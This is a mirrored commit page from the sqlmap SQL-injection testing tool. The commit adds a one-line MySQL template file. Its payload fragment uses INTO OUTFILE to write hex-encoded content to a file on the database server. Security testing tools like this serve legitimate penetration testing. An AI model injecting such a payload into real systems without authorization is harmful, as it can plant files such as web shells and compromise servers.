mirror of
https://github.com/sqlmapproject/sqlmap
synced 2025-12-06 16:32:23 +01:00
added SQL file to write a file with LIMIT statement on MySQL
This commit is contained in:
parent
cbe8f41746
commit
baeffbf149
1 changed files with 1 additions and 0 deletions
1
procs/mysql/write_file_limit.sql
Normal file
1
procs/mysql/write_file_limit.sql
Normal file
|
|
@ -0,0 +1 @@
|
||||||
|
LIMIT 1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING% --
|
||||||
Loading…
Reference in a new issue